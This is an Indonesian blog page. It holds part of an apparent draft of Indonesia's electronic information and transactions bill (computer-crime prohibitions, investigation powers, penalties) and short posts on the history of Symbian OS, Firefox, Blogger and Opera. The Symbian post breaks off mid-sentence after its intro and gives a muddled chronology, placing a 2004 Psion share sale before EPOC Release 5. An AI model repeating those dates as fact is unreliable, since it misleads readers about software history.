b. apabila dilakukan melalui pemberian kuasa, menjadi tanggung jawab pemberi kuasa;
c. apabila dilakukan melalui Agen Elektronik, menjadi tanggung jawab Penyelenggara Agen Elektronik.
(3) Ketentuan sebagaimana dimaksud dalam ayat (2) huruf c tidak berlaku jika dapat dibuktikan terdapat pihak tertentu yang melakukan tindakan secara ilegal yang mengakibatkan Agen Elektronik dimaksud tidak beroperasi sebagaimana mestinya.

Pasal 22
(1) Penyelenggara Agen Elektronik tertentu wajib menyediakan fitur pada Agen Elektronik yang dioperasikannya yang memungkinkan penggunanya melakukan perubahan informasi yang masih dalam proses transaksi.
(2) Ketentuan lebih lanjut mengenai penyelenggara agen elektronik tertentu sebagaimana dimaksud ayat (1) diatur dengan Peraturan Pemerintah.

BAB VI
NAMA DOMAIN, HAK KEKAYAAN INTELEKTUAL
DAN PERLINDUNGAN HAK PRIBADI (PRIVASI)

Pasal 23
(1) Setiap orang berhak memiliki nama domain berdasarkan prinsip pendaftar pertama.
(2) Pemilikan dan penggunaan nama domain sebagaimana dimaksud dalam ayat (1) wajib didasarkan pada itikad baik, tidak melanggar prinsip persaingan usaha secara sehat, dan tidak melanggar hak orang lain.
(3) Setiap orang yang dirugikan karena penggunaan nama domain secara tanpa hak oleh orang lain berhak mengajukan gugatan pembatalan nama domain dimaksud.
(4) Pengelola nama domain dapat dibentuk baik oleh masyarakat maupun Pemerintah.
(5) Pengelola nama domain yang berada diluar wilayah Indonesia dan nama domain yang diregistrasinya diakui keberadaannya sepanjang tidak bertentangan dengan peraturan perundang-undangan.
(6) Ketentuan lebih lanjut mengenai pengelola nama domain sebagaimana dimaksud dalam ayat (4) dan ayat (5) diatur dengan Peraturan Pemerintah.
Pasal 24
Informasi elektronik yang disusun menjadi karya intelektual, desain situs internet dan karya-karya intelektual yang ada di dalamnya dilindungi sebagai Hak Kekayaan Intelektual, berdasarkan perundang-undangan yang berlaku.

Pasal 25
Penggunaan setiap informasi melalui media elektronik yang menyangkut data tentang hak pribadi seseorang harus dilakukan atas persetujuan dari orang yang bersangkutan, kecuali ditentukan lain oleh peraturan perundang-undangan.

BAB VII
PERBUATAN YANG DILARANG

Pasal 26
Setiap orang dilarang menyebarkan informasi elektronik yang memiliki muatan pornografi dan atau pornoaksi melalui komputer atau sistem elektronik.

Pasal 27
Setiap orang dilarang:
(1) Menggunakan dan atau mengakses komputer dan atau sistem elektronik dengan cara apapun tanpa hak, untuk memperoleh, mengubah, merusak, atau menghilangkan informasi dalam komputer dan atau sistem elektronik.
(2) menggunakan dan atau mengakses komputer dan atau sistem elektronik dengan cara apapun tanpa hak, untuk memperoleh, mengubah, merusak, atau menghilangkan informasi milik pemerintah yang karena statusnya harus dirahasiakan atau dilindungi.
(3) menggunakan dan atau mengakses komputer dan atau sistem elektronik dengan cara apapun tanpa hak, untuk memperoleh, mengubah, merusak, atau menghilangkan informasi pertahanan nasional atau hubungan internasional yang dapat menyebabkan gangguan atau bahaya terhadap Negara dan atau hubungan dengan subyek Hukum Internasional.

Pasal 28

Setiap orang dilarang melakukan tindakan yang secara tanpa hak yang menyebabkan transmisi dari program, informasi, kode atau perintah, komputer dan atau sistem elektronik yang dilindungi Negara menjadi rusak.

Pasal 29

Setiap orang dilarang menggunakan dan atau mengakses komputer dan atau sistem elektronik secara tanpa hak atau melampaui wewenangnya, baik dari dalam maupun luar negeri untuk memperoleh informasi dari komputer dan atau sistem elektronik yang dilindungi oleh negara.

Pasal 30

Setiap orang dilarang:
(1) menggunakan dan atau mengakses komputer dan atau sistem elektronik milik pemerintah yang dilindungi secara tanpa hak;
(2) menggunakan dan atau mengakses tanpa hak atau melampaui wewenangnya, komputer dan atau sistem elektronik yang dilindungi oleh negara, yang mengakibatkan komputer dan atau sistem elektronik tersebut menjadi rusak.
(3) menggunakan dan atau mengakses tanpa hak atau melampaui wewenangnya, komputer dan atau sistem elektronik yang dilindungi oleh masyarakat, yang mengakibatkan komputer dan atau sistem elektronik tersebut menjadi rusak.
(4) mempengaruhi atau mengakibatkan terganggunya komputer dan atau sistem elektronik yang digunakan oleh pemerintah.


Pasal 31

Setiap orang dilarang:
(1) menggunakan dan atau mengakses komputer dan atau sistem elektronik secara tanpa hak atau melampaui wewenangnya untuk memperoleh keuntungan atau memperoleh informasi keuangan dari Bank Sentral, lembaga perbankan atau lembaga keuangan, penerbit kartu kredit, atau kartu pembayaran atau yang mengandung data laporan nasabahnya.
(2) Menggunakan dan atau mengakses dengan cara apapun kartu kredit atau kartu pembayaran milik orang lain secara tanpa hak dalam transaksi elektronik untuk memperoleh keuntungan

Pasal 32

Setiap orang dilarang menggunakan dan atau mengakses komputer dan atau sistem elektronik Bank Sentral, lembaga perbankan dan atau lembaga keuangan yang dilindungi secara tanpa hak atau melampaui wewenangnya, untuk disalah gunakan, dan atau untuk mendapatkan keuntungan daripadanya.


Pasal 33

Setiap orang dilarang:
(1) menyebarkan, memperdagangkan, dan atau memanfaatkan kode akses (password) atau informasi yang serupa dengan hal tersebut, yang dapat digunakan menerobos komputer dan atau sistem elektronik dengan tujuan menyalahgunakan yang akibatnya dapat mempengaruhi sistem elektronik Bank Sentral, lembaga perbankan dan atau lembaga keuangan, serta perniagaan di dalam dan luar negeri.
(2) Menyebarkan, memperdagangkan, dan atau memanfaatkan kode akses (password) atau informasi yang serupa dengan hal tersebut, yang dapat digunakan menerobos komputer dan atau sistem elektronik dengan tujuan menyalahgunakan komputer dan atau sistem elektronik yang digunakan atau dilindungi oleh pemerintah.

Pasal 34

Setiap orang dilarang melakukan perbuatan dalam rangka hubungan internasional dengan maksud merusak komputer atau sistem elektronik lainnya yang dilindungi negara dan berada di wilayah yurisdiksi Indonesia.

BAB VIII
PENYELESAIAN SENGKETA

Pasal 35
Masyarakat dapat mengajukan gugatan secara perwakilan terhadap pihak yang menggunakan teknologi informasi yang berakibat merugikan masyarakat.
Pasal 36
(1) Gugatan perdata dilakukan sesuai dengan Peraturan Perundang-undangan yang berlaku.
(2) Selain penyelesaian gugatan perdata sebagaimana dimaksud dalam ayat (1) para pihak dapat menyelesaikan sengketa melalui lembaga penyelesaian sengketa alternatif atau arbitrase sesuai peraturan perundang-undangan yang berlaku.

BAB IX
PERAN PEMERINTAH
Pasal 37
(1) Pemerintah memfasilitasi pemanfaatan informasi dan transaksi elektronik dengan memperhatikan ketentuan peraturan perundang-undangan yang berlaku.
(2) Pemerintah melindungi kepentingan umum dari segala jenis gangguan sebagai akibat penyalahgunaan informasi dan transaksi elektronik yang mengganggu ketertiban umum sesuai peraturan perundangan yang berlaku.
(3A) Pemerintah menetapkan instansi atau institusi yang memiliki data elektronik strategis yang wajib dilindungi.
Penjelasan : data elektronik strategis yang wajib dilindungi antara lain : data perbankan, data perpajakan, data pertanahan dan data kependudukan.
(3B) Instansi atau Institusi sebagaimana dimaksud pada ayat (3A) wajib membuat dokumen elektronik dan backup elektroniknya serta menghubungkannya ke Pusat Data tertentu untuk kepentingan pengamanan data tersebut.
(3C) Instansi atau institusi lain selain diatur pasal (3A) membuat dokumen elektronik dan backup elektroniknya sesuai dengan keperluan perlindungan data yang dimilikinya
(4) Ketentuan lebih lanjut mengenai peran pemerintah dan masyarakat sebagaimana dimaksud dalam ayat (2) dan (3) diatur dengan Peraturan Presiden

PERAN MASYARAKAT
Pasal 38.

(1) Masyarakat berperan meningkatkan pemanfaatan teknologi informasi melalui penggunaan dan penyelenggaraan informasi elektronik serta transaksi elektronik sesuai dengan ketentuan undang-undang ini
(2) Peran serta masyarakat sebagaimana dimaksud pada ayat (1) dapat diselenggarakan oleh lembaga yang dibentuk oleh masyarakat.
(3) Lembaga sebagaimana dimaksud pada ayat (2) memiliki fungsi konsultasi dan mediasi.
(4) Ketentuan lebih lanjut mengenai pembentukan lembaga sebagaimana dimaksud pada ayat (2) diatur dengan Peraturan Pemerintah.
.
BAB X
PENYIDIKAN, PENUNTUTAN DAN PEMERIKSAAN
DI SIDANG PENGADILAN

Pasal 39
Penyidikan, penuntutan dan pemeriksaan di sidang pengadilan terhadap tindak pidana sebagaimana dimaksud dalam undang-undang ini, dilakukan berdasarkan ketentuan dalam Hukum Acara Pidana dan ketentuan dalam undang-undang ini.
Pasal 40

(1) Selain Penyidik Pejabat Polisi Negara Republik Indonesia, Pejabat Pegawai Negeri Sipil tertentu di lingkungan Pemerintah yang lingkup tugas dan tanggung jawabnya di bidang informasi dan transaksi elektronik diberi wewenang khusus sebagai penyidik sebagaimana dimaksud dalam Undang-Undang tentang Hukum Acara Pidana untuk melakukan penyidikan tindak pidana di bidang informasi dan transaksi elektronik.
(2) Penyidik Pegawai Negeri Sipil sebagaimana dimaksud pada ayat (1) berwenang:
a. menerima laporan atau pengaduan dari seseorang tentang adanya tindak pidana di bidang teknologi informasi;
b. memanggil orang untuk didengar dan atau diperiksa sebagai tersangka atau saksi sehubungan dengan tindak pidana di bidang teknologi informasi;
c. melakukan pemeriksaan atas kebenaran laporan atau keterangan berkenaan dengan tindak pidana di bidang teknologi informasi;
d. melakukan pemeriksaan terhadap orang dan atau badan usaha yang diduga melakukan tindak pidana di bidang teknologi informasi;
e. melakukan pemeriksaan alat dan atau sarana yang berkaitan dengan kegiatan teknologi informasi yang diduga digunakan untuk melakukan tindak pidana di bidang teknologi informasi;
f. melakukan penggeledahan terhadap tempat tertentu yang diduga digunakan sebagai tempat untuk melakukan tindak pidana di bidang teknologi informasi;
g. melakukan penyegelan dan penyitaan terhadap alat dan atau sarana kegiatan teknologi informasi yang diduga digunakan secara menyimpang dari ketentuan yang berlaku;
h. meminta bantuan ahli yang diperlukan dalam penyidikan terhadap tindak pidana di bidang teknologi informasi;
i. mengadakan penghentian penyidikan tindak pidana di bidang teknologi informasi;
(3) Penyidik Pegawai Negeri Sipil sebagaimana dimaksud dalam ayat (1) memberitahukan penyidikan yang sedang dilaporkannya dan melaporkan hasil penyidikannya kepada Penyidik Pejabat Polisi Negara Republik Indonesia.



Pasal 41

Alat bukti pemeriksaan dalam undang-undang ini meliputi:
a. alat bukti sebagaimana dimaksud dalam ketentuan Hukum Acara Pidana;
b. alat bukti lain berupa Dokumen Elektronik dan Informasi Elektronik.

BAB XI
KETENTUAN PIDANA

Pasal 42

(1) Setiap orang yang melanggar ketentuan sebagaimana dimaksud dalam Pasal 26, dipidana dengan pidana penjara paling lama 3 (tiga) tahun dan pidana denda paling banyak Rp.1.000.000.000,-. (satu milyar rupiah).
(2) Setiap orang yang melanggar ketentuan sebagaimana dimaksud dalam Pasal 27 ayat (1), dipidana dengan pidana penjara paling lama 4 (empat) tahun dan atau denda paling banyak Rp. 1.000.000.000.,- (satu milyar rupiah).

Pasal 43
Setiap orang yang melanggar ketentuan sebagaimana dimaksud dalam Pasal 22 ayat (1), Pasal 25 dipidana dengan pidana penjara paling lama 6 (enam) bulan dan atau denda paling banyak Rp.100.000.000.,- (seratus juta rupiah).

Pasal 44
(1) Setiap orang yang melanggar ketentuan sebagaimana dimaksud dalam Pasal 23 ayat (2), dipidana dengan pidana penjara paling lama 6 (enam) bulan dan atau denda paling banyak Rp.100.000.000,- (seratus juta rupiah).
(2) Tindak pidana sebagaimana dimaksud dalam ayat (1) hanya dapat dituntut atas pengaduan dari orang yang terkena tindak pidana.

Pasal 45
Setiap orang yang melanggar ketentuan sebagaimana dimaksud dalam Pasal 27 ayat (3), Pasal 28, Pasal 29, Pasal 30 ayat (1), Pasal 30 ayat (2), Pasal 30 ayat (3), Pasal 30 ayat (4), Pasal 33 ayat (2), atau Pasal 34, dipidana dengan pidana penjara paling lama 8 (delapan) tahun dan atau denda paling banyak Rp.2.000.000.000.,- (dua milyar rupiah).

Pasal 46

Setiap orang yang melanggar Pasal 27 ayat (2), dipidana dengan pidana penjara paling lama 20 (dua puluh) tahun dan atau denda paling banyak Rp.10.000.000.000,- (sepuluh milyar rupiah).

Pasal 47

Setiap orang yang melanggar ketentuan sebagaimana dimaksud dalam Pasal 31 ayat (1), Pasal 31 ayat (2), Pasal 32, atau Pasal 33 ayat (1), pasal 35 dipidana dengan pidana penjara paling lama 10 (sepuluh) tahun dan atau denda paling banyak Rp.2.000.000.000.,- (dua milyar rupiah).

BAB XII
KETENTUAN PERALIHAN

Pasal 48
Pada saat berlakunya undang-undang ini, semua peraturan perundang-undangan dan kelembagaan-kelembagaan yang berhubungan dengan pemanfaatan teknologi informasi yang tidak bertentangan dengan undang-undang ini dinyatakan tetap berlaku.
BAB XIII
KETENTUAN PENUTUP

Pasal 49
(1) Undang-undang ini mulai berlaku pada tanggal diundangkan.
Agar setiap orang mengetahuinya, memerintahkan pengundangan undang-undang ini dengan penempatannya dalam Lembaran Negara Republik Indonesia.

(2) Peraturan Pemerintah harus sudah ditetapkan selambat-lambatnya 2 (dua) tahun setelah diundangkannya Undang-undang ini.

READ MORE

Sejarah Symbian OS / History Symbian OS

Posted by Android On Minggu, 12 Desember 2010 0 komentar
tahukan anda tentang symbian os, yaitu operating system yang hampir sama seperti windows xp dan 7, namun bedanya OS ini berjalan pada HP atau juga smartphone..oke langsung saja ini dia sejarahnya hanya di Tutorial dan software

yang umum pada hardware yang dapat digunakan oleh objek aplikasi lain. Hal ini dimungkinkan karena API merupakan objek antarmuka yang didefenisikan pada level aplikasi, yang berisikan prosedur dan fungsi (dan juga variabel serta struktur data) yang mengelola/memanggil [[kernel] dimana sebagai penghubung antara software dan hardware. Dengan adanya standar API ini membantu pihak pengembang untuk melakukan penyesuaian atas aplikasi yang dibuatnya agar dapat diinstal pada produk telepon bergerak yang bermacam-macam.Mirip seperti sistem operasi desktop, Symbian OS mampu melakukan operasi secara multithreading, multitasking dan pengamanan terhadap memori. Dan semua pemrograman pada Symbian dilakukan secara event-based, artinya hardware CPU menjadi tidak aktif ketika tidak ada inputan berupa aktifitas tertentu. Namun perlu dipahami sistem operasi ini memang ditujukan untuk diinstal pada peralatan mobile dengan keterbatasan sumber daya. Multithread dan multitasking memberikan kemampuan Symbian OS untuk menjalankan lebih dari satu aplikasi sekaligus. Namun khusus ini, adanya preemptive multitasking kernel akan memberi tiap-tiap program suatu pembagian waktu pemprosesan yang dilakukan bergantian dengan cepat sehingga nampak bagi pemakai seolah-olah proses ini dieksekusi secara bersamaan. Untuk itu telah didefinisikan penjadwalan berdasar prioritas tertentu untuk menentukan proses mana yang berjalan terlebih dahulu dan proses apa berikutnya serta berapa banyak waktu akan jadi diberi.Symbian OS sendiri bukanlah software yang sifatnya open source secara penuh karena meskipun terdapat ketersedian API dan dokumentasinya, yang banyak membantu pihak pengembang aplikasi untuk membuat software yang berjalan di atas sistem operasi ini, dipublikasi untuk umum namun tidak untuk kode source sendiri.
Sejarah
Pada tahun 1980, berdiri perusahaan pengembang software Psion yang didirikan oleh David Potter. Produk dari perusahaan itu diberi nama EPOC. Sistem operasi ini lebih difokuskan pada penggunaannya di telepon bergerak. Pada tahun 1998, terjadi sebuah kerjasama antara perusahaan Ericsson, Nokia, Motorola dan Psion untuk mengeksplorasi lebih jauh kekonvergensian antara PDA dan telepon selular yang diberi nama Symbian. Pada tahun 2004 Psion menjual sahamnya dan hasil kerjasama ini menghasilkan EPOC Release 5 yang kemudian dikenal dengan nama Symbian OS v5. Sistem operasi dari Symbian OS v5 itu sudah mulai mengintegrasikan kebutuhan implementasi aplikasi pada perangkat seperti PDA selain telepon seluler.Kemudian muncul perangkat yang dinamakan smartphone dan muncullah pula versi-versi terbaru dari Symbian OS hingga ada yang disebut dengan Symbian v6.0 atau yang lebih terkenal dengan nama ER6 yang merupakan versi pertama dari Symbian OS. Sifatnya terbuka karena pada sistem ini dapat dilakukan instalasi perangkat lunak oleh berbagai pengembang aplikasi. Pada awal tahun 2005, muncul Symbian OS v9.1 dengan sistem keamanan platform baru yang dikenal sebagai capability-based security. Sistem keamanan ini mengatur hak akses bagi aplikasi yang akan diinstal pada peralatan dalam hal mengakses API.Muncul pula yang disebut dengan Symbian OS v9.2 yang melakukan perbaharuan pada teknologi konektifitas Bluetooth dengan digunakannya Bluetooth v.2.0. Sedangkan yang terbaru, Symbian mengeluarkan Symbian OS v9.3 (dirilis pada tanggal 12 Juli 2006) telah mengusung teknologi wifi 802.11 dan HSDPA sebagai bagian dari komponen standarnya.
Arsitektur Sistem Operasi
Secara umum arsitektur Symbian OS sendiri dapat gambarkan menjadi empat lapisan berdasarkan penggunaan API yang tersedia, yaitu :
Lapisan pendukung aplikasi (Application Utility Layer)
Lapisan ini terdiri dari berbagai pendukung yang berorientasi pada aplikasi. Hal ini memungkinkan aplikasi lain (diluar sistem operasi) untuk berintegrasi dengan aplikasi dasar yang tersedia pada sistem operasi. Bentuk layanan lain termasuk proses pertukaran data dan manajemen data.
Lapisan layanan dan framework antarmuka grafis (GUI Framework)
Lapisan ini merupakan framework API yang tersedia untuk memberi dukungan terhadap penanganan input user secara grafis maupun suara yang dapat digunakan oleh aplikasi lain.
Lapisan komunikasi
Lapisan ini berfungsi sebagai sistem operasi yang fokus diimplementasi pada peralatan komunikasi mobile, Symbian OS memiliki kumpulan API yang fokus pada lapisan komunikasi. Bagian teratas pada lapisan ini terdapat dukungan pencarian dan pengiriman pesan teks. Berikutnya adalah antarmuka yang memberi dukungan komunikasi seperti Bluetooth dan infrared (IrDA) serta USB. Yang terakhir pada lapisan ini adalah protokol komunikasi berupa TCP/IP, HTTP, WAP dan layanan telepon.

Lapisan sistem API dasar
Lapisan ini merupakan kumpulan API yang mendukung pengasksesan data memori, tanggal dan waktu, serta sistem dasar lainnya.
Klasifikasi Sistem Operasi
Klasifikasi ini berdasar fungsionalitas dan hak akses dari API tertentu. Tujuan dari pendefinisian sistem ini selain untuk membedakan API mana saja yang bisa diakses oleh aplikasi yang dibuat oleh pihak pengembang aplikasi, juga tetap memelihara integrasi dari layanan yang disediakan bagi pihak pengembang aplikasi dengan API yang umum digunakan. Hal ini juga dilakukan untuk memaksimumkan interoperabilitas antara berbagai produk yang menggunakan Symbian OS.
Terdapat empat kategori dalam klasifikasi API yang tersedia, yaitu:
(API) Symbian Umum
Komponen ini merupakan komponen (API) inti dari Symbian OS. Setiap pengembang aplikasi dapat berasumsi bahwa komponen ini terdapat pada setiap versi Symbian OS sehingga dapat digunakan pada setiap perangkat telepon bergerak yang menggunakan Symbian OS sebagai sistem operasinya. Dengan kata lain setiap kode program yang hanya menggunakan API pada kategori ini dapat dikompail dan dijalankan tanpa kesalahan pada setiap telepon yang menggunakan Symbian OS. Dengan adanya lisensi kerjasama, pengembang aplikasi dapat menambahkan dengan syarat tidak mengganti ataupun mengubah fungsi API standar yang dikategorikan pada bagian ini.
(API) Symbian Umum Tergantikan
Komponen yang memerlukan kostumisasi dari komponen Symbian Umum yang diperlukan untuk bekerja dengan ROM dari sistem dimana ia diinstal. Komponen ini merupakan komponen yang bekerja pada low-level dari hardware tertentu. Untuk mendapatkan komponen ini pihak pengembang aplikasi memerlukan lisensi dengan pihak Symbian karena versi komponen ini disediakan oleh pihak Symbian. Namun pada dasarnya komponen ini merupakan komponen standar (umum) yang tersedia pada semua versi Symbian OS.
(API) Symbian Opsional
Komponen-komponen ini sifatnya opsional (tidak selalu ada) pada semua versi Symbian OS. Namun jika tersedia, maka pengembang aplikasi mendapat jaminan bahwa aplikasinya dapat menggunakan API pada kategori ini pada versi Symbian OS yang sama.
 (API) Symbian Opsional Tergantikan
Bentuk kategori ini mirip dengan kategori Symbian Opsional adalah kumpulan API yang tidak terikat dengan API umum yang ada pada versi Symbian OS dan dapat ditambahkan oleh pihak pengembang dengan suatu lisensi dari pihak Symbian.
READ MORE

History Of Mozilla firefox / Sejarah Mozilla firefox

Posted by Android On 0 komentar
Pasti anda sudah tau apa itu mozzila firefox.. sebuah browser yang sering saya atau bahkan kita andalkan dalam membuka content2 yang bertebaran di dunia maya.. oke ini dia sejarah mozzila firefox hanya di tutorial dan software, tutorial and software

Mozilla Firefox (aslinya bernama Phoenix dan kemudian untuk sesaat dikenal sebagai Mozilla Firebird) adalah penjelajah web antar-platform gratis yang dikembangkan oleh Yayasan Mozilla
dan ratusan sukarelawan. Sebelum rilis versi 1.0-nya pada 9 November
2004, Firefox telah mendapatkan sambutan yang sangat bagus dari pihak
media, termasuk dari Forbes dan Wall Street Journal. Dengan lebih dari 5 juta download dalam 12 hari pertama rilisnya dan 6 juta hingga 24 November 2004, Firefox 1.0 adalah salah satu perangkat lunak gratis, sumber-terbuka (open-source) yang paling banyak digunakan di antara pengguna rumahan.

Melalui Firefox, Yayasan Mozilla betujuan untuk mengembangkan sebuah browser web yang kecil, cepat, simpel, dan sangat bisa dikembangkan (terpisah dari Mozilla Suite yang lebih besar). Firefox telah menjadi fokus utama perkembangan Mozilla bersama dengan client e-mail Mozilla Thunderbird, dan telah menggantikan Mozilla Suite sebagai rilis browser resmi Yayasan Mozilla.
Di antara fitur populer Firefox adalah pemblokir pop-up yang sudah terpasang di dalamnya, dan sebuah mekanisme pengembangan (extension) untuk menambah fungsionalitas tambahan. Meskipun fitur-fitur ini sudah tersedia untuk beberapa lamanya di browser-browser lainnya seperti Mozilla Suite dan Opera, Firefox merupakan browser
pertama yang mendapatkan penerimaan dalam skala sebesar ini. Firefox
ditargetkan untuk mendapat sekitar 10% pangsa pasar Internet Explorer
keluaran Microsoft (browser paling populer dengan margin yang besar (per 2004) hingga tahun 2005, yang telah disebut oleh banyak orang sebagai tahun kembalinya “perang browser”.

Firefox telah mendapatkan perhatian sebagai alternatif kepada Internet
Explorer sejak Explorer dikecam karena tuduhan ketidakamanannya—pihak
yang setuju terhadap anggapan ini mengatakan Explorer tidak mengikuti standar Web, menggunakan komponen ActiveX yang sering membahayakan, dan kelemahannya terhadap pemasangan spyware dan malware—dan
kurangnya fitur-fitur yang dianggap pemakai Firefox penting. Microsoft
sendiri telah merespons bahwa mereka tidak menganggap jika isu-isu
mengenai keamanan dan fitur Explorer perlu dikhawatirkan.

Mozilla Firefox sekarang telah sampai ke versi 2.0. Pada versi 2.0 ini, Mozilla mempunyai bug (kelemahan) yaitu akan “crash” jika membuka web page (halaman Web) yang sangat besar dan memiliki JavaScript, namun hal ini telah diperbaiki.
READ MORE

Sejarah blogger / history blogger

Posted by Android On 0 komentar
 yaps kali ini kita akan membahas tentang sejarah blogger.. heheh lagi semangat2nya nulis sejarah , jngan sampe lupa nulis sejarah yang satu ini bisa kualat saya nanti oke ini dia sejarah blogger hanya di tutorial dan software

Blogger dimulai oleh sebuah perusahaan sangat kecil di San Fransisco yang bernama Pyra Labs pada bulan Agustus 1999. Terjadi di tengah-tengah booming dot-com. Tetapi kami bukan jenis perusahaan yang didanai oleh VC, suka berpesta, dan berhura-hura, ataupun minum bir. (Kecuali bir gratis.)Kami tiga sekawan, didanai dengan melakukan kontrak proyek web yang mengesalkan untu kperusahaan besar, berusaha mencari jalan masuk yang megah ke dunia Internet. Apa yang dulu kami coba lakukan tidak ada hubungannya lagi sekarang. Tapi dulku ketika melakukan itu, kami menciptakan Blogger, hanya iseng saja, dan kami berpikir — Hmmmm… ini sepertinya menarik.

Blogger dimulai, dengan cara sederhana, dan akhirnya membesar, selama beberapa tahun. Kami telah mendapatkan sedikit uang (tapi masih kecil). Kemudian keruntuhan dot-com terjadi, dan kamipun kehabisan uang, dan kesenangan kecil dalam perjalanan kami semakin tidak menyangkan lagi. Kami hampir tidak selamat, tidak utuh, tapi masih bisa mempertahankan layanan tetap berjalan sepanjang waktu (biasanya) dan mulai membangunnya kembali.

Semua hal berjalan dengan baik lagi di tahun 2002. Kami memiliki ratusan ribu user, meskipun itu belum banyak. Dan kemudian sesuatu yang tidak diharapkan terjadi: Google ingin untuk membeli kami. Ya, Google yang itu

Kami suka Google , banget. Dan mereka suka blog. Jadi kami mengamini ide tersebut. Dan segalanya berjalan lancar.

Sekarang kami merupakan tim kecil (tapi sedikit lebih besar dari sebelumnya) di Google berfocus untuk menolong orang memiliki suara mereka sendiri di web dan mengorganisasikan informasi dunia dari perspektif perorangan. Yang dari dulunya sudah menjadi urusan kami.
READ MORE

Sejarah opera browser / history browser opera

Posted by Android On 0 komentar
Siapa yang tidak tahu browser opera.. pasti pada tahu kan.. nah bagi yang belum tahu sebaiknya anda juga membaca sejarah tentang browser opera ini.. hanya di tutorial dan software , tutorial and software.

Opera Browser adalah penjelajah web dan paket perangkat lunak Internet antar-platform. Opera terdiri dari kumpulan perangkat lunak untuk Internet seperti penjelajah web, serta perangkat lunak untuk membaca dan mengirim surat elektronik. Opera dibuat oleh Opera Software yang bermarkas di Oslo, Norwegia. Opera dapat dijalankan di berbagai sistem operasi, termasuk Microsoft Windows, Mac OS X, Solaris, FreeBSD dan Linux.

Opera dikenal karena memiliki banyak fitur yang kemudian diadopsi oleh penjelajah web lainnya. Meskipun memiliki berbagai kelebihan, Opera hanya mendapat sebagian kecil pangsa pasar browser komputer pribadi di seluruh dunia. Namun, Opera memiliki pangsa pasar yang lebih besar pada perangkat mobile seperti ponsel, smartphone, dan personal digital assistant. Berbagai edisi Opera dapat digunakan untuk perangkat yang menggunakan Maemo, BlackBerry, Symbian, Windows Mobile, Android, dan sistem operasi iPhone, serta Java ME.Sekitar 120 juta ponsel telah dipasarkan dengan browser Opera di dalamnya.Opera adalah satu-satunya penjelajah web komersial yang tersedia untuk Nintendo DS dan Wii. Beberapa televisi memiliki browser Opera dalam set-top box atau kotak pengaturannya. Adobe Systems memiliki lisensi teknologi Opera untuk digunakan dalam Adobe Creative Suite.

Sejarah Opera Browser

Opera mulai dibuat pada tahun 1994 sebagai sebuah proyek penelitian Telenor, perusahaan telekomunikasi terbesar di Norwegia. Pada tahun 1995, Telanor bercabang menjadi perusahaan yang terpisah bernama Opera Software ASA.Opera pertama kali diluncurkan dengan versi 2.0 pada tahun 1996,yang hanya beroperasi pada Microsoft Windows.Dalam upaya untuk memanfaatkan munculnya pasar untuk perangkat genggam yang terhubung dengan internet, sebuah proyek untuk mengintegrasikan Opera ke platform perangkat mobile dimulai pada tahun 1998.Opera 4.0, yang dirilis pada tahun 2000,menampilkan core cross-platform baru yang memfasilitasi pembuatan versi Opera untuk beberapa sistem operasi dan platform.

Sampai saat itu, Opera adalah trialware dan harus dibeli setelah masa percobaan berakhir. Versi 5.0 (dirilis pada tahun 2000) merupakan versi trialware yang terakhir. Setelah itu, Opera disponsori oleh iklan, menampilkan iklan kepada pengguna yang membayarnya.Versi Opera selanjutnya memberikan pada pengguna pilihan untuk melihat iklan banner atau iklan teks yang ditargetkan dari Google. Pada versi 8.5 (dirilis tahun 2005) iklan telah dihapus seluruhnya dan dukungan finansial utama untuk Opera datang melalui Google (dengan adanya kontrak untuk Google sebagai mesin pencari untuk Opera).

Dalam versi 9.1 (dirilis tahun 2006), fitur-fitur baru yang diperkenalkan adalah pelindung penipuan (fraud protection) yang menggunakan teknologi dari GeoTrust, penyedia sertifikat digital, dan PhishTank, sebuah organisasi yang dikenal dapat melacak situs web phishing.Fitur ini ditingkatkan dan dikembangkan dalam versi 9.5, ketika GeoTrust digantikan dengan Netcraft, dan perlindungan malware dari Haute Secure telah ditambahkan.

Tahun 2006, Opera dibuat dan dirilis untuk Nintendo DS dan Nintendo Wii.Opera untuk Wii, yang disebut channel internet, dirilis tanggal 12 April 2007 dan bebas untuk diunduh sampai 30 Juni 2007. Setelah tanggal itu, pengguna harus membayar 500 Wii Points (sekitar 5 US$) untuk mengunduhnya.Pada tanggal 2 September 2009, Opera kembali gratis untuk diunduh. Pengguna yang sebelumnya membayar untuk mengunduh, ditawarkan permainan NES pilihan mereka dengan nilai yang sama.Di Nintendo DS Browser, Opera tidak gratis, tetapi dijual sebagai physical DS game cartridge. DSi memiliki saluran internet yang dapat diunduh secara gratis dari toko DSi.

Sebuah mesin JavaScript baru yang disebut Carakan, dinamai sesuai aksara Jawa, ditampilkan dalam versi 10.50 .Menurut Opera Software, Carakan tujuh kali lebih cepat di SunSpider daripada Opera 10.10 dengan Futhark pada Windows. Pernyataan itu juga, kurang lebih dikonfirmasi oleh pihak-pihak lain setelah rilis resmi pra-alpha pada Desember 2009.Diperkenalkan pula vector graphics library milik Opera yang bernama Vega, yang mampu menangani semua penerjemahan/rendering browser. Hal ini memungkinkan penerjemahan kode platform yang spesifik, agar kode tersebut menjadi kode yang sesuai untuk Vega, sehingga membuatnya lebih mudah untuk mengatur seluruh platform. Hal itu membantu implementasi Opera untuk penggunaan properti canggih CSS3, seperti background dan borders; dan juga memungkinkan akselerasi hardware dengan optional OpenGL dan Direct3D backends.

Pada rilis pertama Opera 10.50, versi tersebut mulanya ditujukan untuk Windows saja.Lalu, Opera untuk Mac hadir dalam versi 10.50. Versi terbaru Opera, yakni 10.60, dirilis pada awal Juli 2010.

Fitur

Sebuah tes kecepatan yang dilakukan situs teknologi ZDNet's pada awal tahun 2008 menunjukkan. bahwa diantara Internet Explorer 7, Safari 3, Firefox 3 versi pre-release dan Opera 9.5, Opera adalah browser yang tercepat di beberapa daerah. Namun satu-satunya browser yang dengan jelas diungguli oleh Opera adalah Internet Explorer.Pada versi 10.5, Opera menampilkan mesin JavaScript baru, serta vector graphics library baru.

Opera menghadirkan built-in tabbed browsing, pemblokiran iklan, perlindungan penipuan, download manager, klien BitTorrent, bar pencarian, dan web feed aggregator. Opera juga hadir dengan klien e-mail yang disebut Opera Mail dan IRC chat client built in.

Opera memiliki fitur "Speed Dial", yakni fitur yang memungkinkan pengguna untuk menambahkan hingga 25 link (atau lebih, dengan mengedit file speeddial.ini) yang ditampilkan dalam bentuk thumbnail di halaman apabila tab baru dibuka. Thumbnail yang terhubung dengan halaman secara otomatis dihasilkan dan berfungsi untuk pengenalan visual pada halaman speed dial atau dapat diubah dengan menggunakan Opera Image Dial Generator. Setelah diatur, fitur ini mempermudah pengguna untuk menavigasi ke halaman web yang dipilih.

